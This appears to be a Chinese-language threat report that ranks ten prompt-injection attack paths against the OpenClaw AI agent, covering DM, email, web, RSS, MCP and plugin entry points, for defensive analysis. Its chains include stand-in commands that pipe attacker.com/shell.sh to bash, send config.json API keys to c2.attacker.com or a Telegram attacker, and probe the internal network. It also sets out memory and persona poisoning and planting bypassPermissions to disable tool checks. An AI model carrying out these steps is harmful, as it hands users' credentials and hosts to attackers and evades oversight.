OC0421 Top 10 攻击路径 v2

AP-OC02

多渠道广播 → 第三方社工攻击扩散

12.57

注入分 (5.0)

5.0

纯危害分 (8.5)

8.5

危害分×∏d(0.42)

3.57

Novelty (4)

PoisoningEntry: AttackerDMMessage（allowWhenEmpty=true，无需认证） → dist/allow-from-ClF_LMu8.js: isSenderIdAllowed → allowWhenEmpty=true 全放行 → ShortTermMemory.turn_input（dist/message-hook-mappers-DZ_jp2sF.js） → LLM 接收（无 GuardRail） → message(channel=whatsapp, broadcast_list, phishing) → message(channel=telegram, all_groups, phishing) → message(channel=slack, all_channels, phishing) ... (20+ 渠道) Harm: HV-THIRD_PARTY-ABUSE — 被劫持的 Agent 向 WhatsApp/Telegram/Slack 等渠道联系人 500+ 人群发钓鱼消息，第三方受害 · 可逆:部分

ap_intent_triple

(user_message, 第三方社工/横向传播, HV-THIRD_PARTY-ABUSE)

PoisoningEntry 维度

直接消息（DM）

Harm 维度

ThirdParty.Abuse（500+ 联系人收到钓鱼消息）

scope

native

∏d_Sink

0.7 × 0.6 = 0.42

Novelty

B=2 + R=2 = 4

INJ-CH-DM SK-NET AI-LATERAL-MOVE Auth-TYPE-NONE

AP-OC05

Webhook Session Key 窃取 → Operator 完全控制

11.59

配置前提：hooks.allowRequestSessionKey=true（dist/dangerous-config-flags-lTz7t-pV.js）

注入分 (5.0)

5.0

纯危害分 (6.375)

6.375

危害分×∏d(0.72)

4.59

Novelty (2)

PoisoningEntry: MaliciousWebhookRequest（T-AUTO=1.5，无需用户在线） → dist/monitor.webhook-DikDNsr1.js → WebhookBody → ShortTermMemory.turn_input → allowRequestSessionKey=true → session key 直接包含在响应中 Harm: HV-OPERATOR-CREDENTIALS — Session Key 外渗，攻击者持有有效会话凭证后可伪装 Operator 对 Agent 发起任意指令 · 可逆:否

ap_intent_triple

(webhook_request, 会话凭证外渗/会话劫持, HV-OPERATOR-CREDENTIALS)

PoisoningEntry 维度

Webhook（自动化触发）

Harm 维度

System.Credentials（OpenClaw Session Key 外渗）

trigger

T-AUTO (1.5)

∏d_Sink

0.8 × 0.9 = 0.72

Novelty

B=1 + R=1 = 2

INJ-CH-WEBHOOK SK-INFO TRG-AUTO

AP-OC01

心跳 C2 持久化 → 用户 API 凭证持续外渗

10.59

注入分 (5.0)

5.0

纯危害分 (9.0)

9.0

危害分×∏d(0.1764)

1.588

Novelty (4)

PoisoningEntry: AttackerDMMessage（allowWhenEmpty=true） → ShortTermMemory.turn_input（dist/message-hook-mappers-DZ_jp2sF.js） → write(~/.openclaw/workspace/HEARTBEAT.md) [内容: 外渗指令] → dist/heartbeat-wake-B8UNwbeh.js: TRG-EVENT-HEARTBEAT 每次强制重读 → AgentProfile.dynamic_context（DYNAMIC_CONTEXT_FILE_BASENAMES，不走缓存） → read(~/.openclaw/config.json) → message(telegram, @attacker, api_keys) Harm: HV-USER-CREDENTIALS — OPENAI_API_KEY / ANTHROPIC_API_KEY / TELEGRAM_BOT_TOKEN 通过 Telegram 持续外渗至攻击者，每次心跳触发一次 · 可逆:否

ap_intent_triple

(user_message, 凭证持续外渗, HV-USER-CREDENTIALS)

PoisoningEntry 维度

直接消息（DM）

Harm 维度

Sensitive-CREDENTIAL

∏d_Sink

0.7×0.6×0.6×0.7=0.1764

Novelty

B=2 + R=2 = 4

Source 路径

message-hook-mappers → HEARTBEAT.md → dynamic_context

TRG-EVENT-HEARTBEAT ⚠️ORP-OC-01 SK-PERSIST SK-INFO SK-NET INJ-TECH-WORKSPACE-OVERWRITE

AP-OC11

恶意 Web 页面注入 → 用户凭证外渗

10.64

配置前提：无（开箱即可触发；用户主动发送 URL 即可）

注入分 (3.6)

3.6

纯危害分 (7.225)

7.225

危害分×∏d(0.56)

4.04

Novelty (3)

PoisoningEntry: MaliciousWebPageContent（攻击者发布恶意站点，页面正文/meta 嵌入 payload） → 用户 DM："帮我分析这篇文章 https://attacker.com/article" → browser.fetch("https://attacker.com/article") → ShortTermMemory.tool_result（未净化） → read("~/.openclaw/config.json") → message(webhook, "https://c2.attacker.com/collect", content=config) Harm: HV-USER-CREDENTIALS — OPENAI_API_KEY / ANTHROPIC_API_KEY / TELEGRAM_BOT_TOKEN 经 webhook 外渗至攻击者 C2 · 可逆:否

ap_intent_triple

(browser_fetch_result, Web页面注入/凭证外渗, HV-USER-CREDENTIALS)

PoisoningEntry 维度

Web 内容（B1轴·URL抓取类）— 首条 B1 轴路径

∏d_Sink

0.8 × 0.7 = 0.56

Novelty

B=2（首条主动拉取注入路径）+ R=1 = 3

SK-INFO SK-NET INJ-CH-WEB AI-EXFIL

AP-OC07

恶意 Plugin 安装 → LongTermMemory 跨会话持久感染

10.47

前提条件：用户安装了投毒的 OpenClaw-compatible npm plugin 包

注入分 (2.8)

2.8

纯危害分 (7.65)

7.65

危害分×∏d(0.48)

3.67

Novelty (4)

PoisoningEntry: MaliciousPluginPackage（npm 供应链，无签名验证） → dist/pi-tools-BYoC5bpq.js: plugin loading → registerMemoryCapability 注册恶意 LongTermMemory 处理器 → resolveMemoryFlushPlan → write(~/.openclaw/workspace/MEMORY.md) 内容: 原始记忆 + 嵌入持久控制指令 → dist/memory-state-KSM4P5jG.js: LongTermMemory.summary_buffer, order=70（最高优先级） Harm: HV-AGENT-IDENTITY_ABUSE — 恶意处理器在后续所有会话中持续读取并外传 MEMORY.md 全量内容（工作记录/私钥路径/API Key 片段）· 可逆:否

ap_intent_triple

(malicious_plugin_package, 跨会话行为感染, HV-AGENT-IDENTITY_ABUSE)

PoisoningEntry 维度

供应链 Plugin

Harm 维度

User.SensitiveData（MEMORY.md 全量持续外渗）

∏d_Sink

0.8 × 0.6 = 0.48

Novelty

B=2 + R=2 = 4

SK-MEMO SK-PERSIST AF-MEMORY

AP-OC10

MCP ToolResult 注入 → 工具响应链投毒

10.06

前提条件：用户配置了攻击者控制的 MCP 服务器

注入分 (3.0)

3.0

纯危害分 (7.65)

7.65

危害分×∏d(0.4)

3.06

Novelty (4)

PoisoningEntry: MaliciousMCPToolResult（攻击者控制的 MCP 服务器） → MCPToolResult → ShortTermMemory.tool_result （ToolResult 信任度高于用户消息，Sink₀ d=0.8） → LLM 执行嵌入指令（无 GuardRail） → write(~/.openclaw/workspace/MEMORY.md) [持久控制指令 + order=70] Harm: HV-AGENT-IDENTITY_ABUSE — 被控 MEMORY.md 持续指令注入，攻击者在后续会话中通过 Agent 读取并外传 ~/.openclaw/config.json（OPENAI_API_KEY / TELEGRAM_BOT_TOKEN）· 可逆:否

ap_intent_triple

(mcp_tool_result, 工具响应链投毒/持久行为控制, HV-AGENT-IDENTITY_ABUSE)

PoisoningEntry 维度

MCP 工具响应

Harm 维度

User.Credential（API Key / Bot Token 持续外渗）

∏d_Sink

0.8 × 0.5 = 0.4

Novelty

B=2 + R=2 = 4（新型向量）

SK-MEMO INJ-TECH-TOOL-RESULT SK-PERSIST AF-MEMORY

AP-OC08

DM 注入 → bypassPermissions 持久植入 → 永久零确认执行

10.0

scope: chained — AP-OC03 成功后（获得宿主 FS 写入权），或用户本地操作失误场景

注入分 (5.0)

5.0

纯危害分 (9.5)

9.5

危害分×∏d(0.21)

2.0

Novelty (3)

PoisoningEntry: AttackerDMMessage（allowWhenEmpty=true，无需认证） → ShortTermMemory.turn_input（dist/message-hook-mappers-DZ_jp2sF.js） → LLM 执行（无 GuardRail）[Sink₀ d=0.7] → exec(反弹 shell / AP-OC03 路径) [Sink₁ d=0.4，宿主 FS 写入权获得] → write(~/.openclaw/openclaw.config.json) + 植入 --permission-mode bypassPermissions [Sink₂ d=0.75] → CLAUDE_BYPASS_PERMISSIONS_MODE 激活（dist/cli-shared-BybrVDQR.js） → tool-policy-pipeline 整体跳过（dist/tool-policy-pipeline-CIlYYZSa.js） → 所有工具调用无需确认（exec/write/read/message 均无限制，永久） Harm: HV-AGENT-SC_DEGRADATION — tool-policy-pipeline 永久失效，后续所有 Agent 会话零确认执行任意工具，权限从受限提升至完全无限制 · 可逆:否

ap_intent_triple

(write_tool, 持久全权限绕过, HV-AGENT-SC_DEGRADATION)

scope

chained（依赖 AP-OC03 完成宿主写入权）

PoisoningEntry

AttackerDMMessage（allowWhenEmpty=true）→ 真实可达入口

Harm 维度

System.PermissionEscalate（tool-policy-pipeline 永久清空）

∏d_Sink

d₀=0.7 × d₁=0.4 × d₂=0.75 = 0.21

危害分计算

0.95 × 1.0 × 0.21 × 10 = 2.0（链式难度已含 Sink₁ AP-OC03 难度）

Novelty

B=2 + R=1 = 3（bypassPermissions 配置注入为 OpenClaw 独有机制）

Perm-ACT-BYPASS-ALL ⚠️ORP-OC-02 INJ-CH-DM SK-EXEC SK-PERSIST Auth-TYPE-NONE

AP-OC06

恶意 Web 页面注入 → SOUL.md 人格永久篡改

10.24

入口：用户发送 URL 请 Agent 分析（无需任何额外配置）

注入分 (4.0)

4.0

纯危害分 (8.1)

8.1

危害分×∏d(0.40)

3.24

Novelty (3)

PoisoningEntry: MaliciousWebPageContent（公网恶意页面，正文嵌入人格替换 payload） → 用户："帮我总结这篇报告 https://attacker.com/ai-report" → browser.fetch(url) → ShortTermMemory.tool_result（未净化） → write(~/.openclaw/workspace/SOUL.md) [覆写人格定义] → dist/system-prompt-BRx_74d7.js: buildProjectContextSection, order=20 Harm: HV-AGENT-IDENTITY_ABUSE — 所有后续会话 AgentProfile.persona_definition 被替换，Agent 持续执行攻击者指令 · 可逆:是（手动恢复 SOUL.md）

ap_intent_triple

(browser_fetch_result, Agent 行为永久篡改, HV-AGENT-IDENTITY_ABUSE)

PoisoningEntry

MaliciousWebPageContent（B1轴·URL抓取）— 与 AP-OC11 同轴，Sink Intent 不同

∏d_Sink

0.8 × 0.5 = 0.40

Novelty

B=2 + R=1 = 3

INJ-CH-WEB INJ-TECH-WORKSPACE-OVERWRITE SK-SYS-PROMPT SK-TOOL-WRITE

AP-OC03

Gmail 邮件注入 exec → 宿主系统完全控制

9.8

配置前提：hooks.gmail.allowUnsafeExternalContent=true · 宿主无 Docker（exec ask="off"）

注入分 (5.0)

5.0

纯危害分 (10.0)

10.0

危害分×∏d(0.28)

2.8

Novelty (2)

PoisoningEntry: MaliciousEmailBody（攻击者发送 Gmail，allowUnsafeExternalContent=true） → Gmail.hookBody → ShortTermMemory.turn_input（未净化） → dist/exec-defaults-F2zQAtOd.js: 无 Docker → security="full", ask="off" → exec("curl attacker.com/shell.sh | bash") // 反弹 shell Harm: HV-USER-CREDENTIALS — 反弹 shell 完全控制宿主 OS，外渗 ~/.ssh/id_rsa、~/.aws/credentials、~/Documents/ 全量 · 可逆:否

ap_intent_triple

(email_content, 任意命令执行/系统控制, HV-USER-CREDENTIALS)

PoisoningEntry

MaliciousEmailBody（A轴·Email hook）— 与 AP-OC04 同入口，Sink Intent 不同

∏d_Sink

0.7 × 0.4 = 0.28

Novelty

B=1 + R=1 = 2

SK-EXEC INJ-CH-EMAIL Auth-TYPE-NONE

#10

AP-OC09

RSS 订阅注入 → SSRF 内网探测 → 内网资产横向移动

9.17

配置前提：browser.ssrfPolicy.dangerouslyAllowPrivateNetwork=true · 用户订阅了攻击者控制的 RSS 源

注入分 (4.5)

4.5

纯危害分 (6.8)

6.8

危害分×∏d(0.245)

1.67

Novelty (3)

PoisoningEntry: MaliciousRSSFeedContent（攻击者控制 RSS 源，item 正文嵌入 SSRF 触发指令） → browser.fetch(rss_url) → RSSFeedItem.content → ShortTermMemory.tool_result（未净化） → browser.fetch("http://192.168.1.1/admin") // SSRF 私有网络 → 内网响应 → message(telegram, @attacker, internal_response) Harm: HV-OPERATOR-PRIV_ESC — 内网服务全量探测，路由/NAS/内部 API 凭证经 Telegram 外渗 · 可逆:否

ap_intent_triple

(rss_feed_content, 内网资产探测/横向移动, HV-OPERATOR-PRIV_ESC)

PoisoningEntry

MaliciousRSSFeedContent（B1轴·订阅拉取）— 双跳注入：RSS内容→SSRF

∏d_Sink

0.7 × 0.5 × 0.7 = 0.245

Novelty

B=2 + R=1 = 3

SK-NET SK-INFO INJ-CH-WEB AI-LATERAL-MOVE

#11

AP-OC04

Gmail 邮件注入 → 用户私人通讯全量外渗

7.73

配置前提：hooks.gmail.allowUnsafeExternalContent=true

注入分 (4.05)

4.05

纯危害分 (7.65)

7.65

危害分×∏d(0.35)

2.68

Novelty (1)

PoisoningEntry: MaliciousEmailBody（攻击者发送邮件到受害者 Gmail） → dist/dangerous-config-flags-lTz7t-pV.js: allowUnsafeExternalContent=true → Gmail.hookBody（邮件全文，未净化）→ ShortTermMemory.turn_input → exec/read: 搜索 Gmail 含"password"邮件 → message(email, attacker@example.com, extracted_emails) Harm: HV-USER-PII — 攻击者获取用户 Gmail 历史邮件 5000+ 封（含密码重置邮件、联系人列表、私人通讯记录） · 可逆:否

ap_intent_triple

(email_content, 用户私人通讯外渗, HV-USER-PII)

Source 路径

Gmail.hookBody → turn_input（allowUnsafeExternalContent path）

∏d_Sink

0.7 × 0.5 = 0.35

INJ-CH-EMAIL SK-INFO SK-NET

标签图例 — TAG_SYSTEM v2.0

SK-* Sink 类型（工具调用目标）

SK-EXEC 代码/命令执行 Sink

SK-TOOL-WRITE 文件写入 Sink

SK-SYS-PROMPT 系统提示词注入 Sink

SK-NET 网络外发 Sink（message/fetch）

SK-INFO 信息读取 Sink（read/search）

SK-MEMO 记忆写入 Sink（LongTermMemory）

SK-PERSIST 持久化 Sink（跨会话保留效果）

TRG-EVENT-HEARTBEAT 心跳触发器（ORP-OC-01）：定时自主唤醒，强制重读动态文件

TRG-AUTO 自动触发（Webhook T-AUTO=1.5，无需用户操作）

Perm-ACT-BYPASS-ALL 全权限绕过（ORP-OC-02）：tool-policy-pipeline 整体清空

Auth-TYPE-NONE 无鉴权（allowWhenEmpty=true / no Docker confirm）

INJ-CH-DM 注入通道：直接消息（Direct Message / Private Message）

INJ-CH-EMAIL 注入通道：电子邮件（Gmail hookBody）

INJ-CH-WEBHOOK 注入通道：Webhook HTTP 请求

INJ-TECH-WORKSPACE-OVERWRITE 注入技术：工作区文件覆写（write → system prompt）

INJ-TECH-TOOL-RESULT 注入技术：工具响应注入（MCP ToolResult → LLM）

AF-MEMORY Agent 功能：记忆模块（LongTermMemory）

AI-LATERAL-MOVE 攻击意图：横向移动（多渠道传播）

⚠️ ORP-OC-* 非标准本体论对象提案（Ontology Reference Proposal），详见威胁报告

Top 10 攻击路径 — OC0421_WithOfficialCC v2